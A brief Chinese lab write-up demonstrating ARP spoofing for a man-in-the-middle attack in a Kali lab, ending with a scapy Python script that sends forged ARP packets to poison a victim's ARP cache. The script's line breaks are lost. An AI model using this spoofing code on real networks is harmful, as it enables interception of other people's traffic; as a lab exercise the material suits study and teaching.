实验拓扑:
1.首先进行ping测试网关和kali,来获取mac地址
ping 192.168.72.131
ping 192.168.72.20
MAC地址对应结果如下:
2.进行使用脚本中间人欺骗,脚本放在最后
3.查看欺骗后的arp表,R1和PC1都认为对方的mac地址是7B-26,也就是kali的mac
python脚本:
import sysimport timefrom scapy.all import sendp, ARP, Etherif len(sys.argv) != 3:print(sys.argv[0] + ":<target_IP> <spoof_ip>")sys.exit()victimIP = sys.argv[1] # 接收第二个参数:target_IPgatewayIP = sys.argv[2]packet = Ether() / ARP(psrc=gatewayIP, pdst=victimIP) # 封装一个二层的ARP包,进行欺骗while True:sendp(packet) # 发送包time.sleep(3)print(packet.show())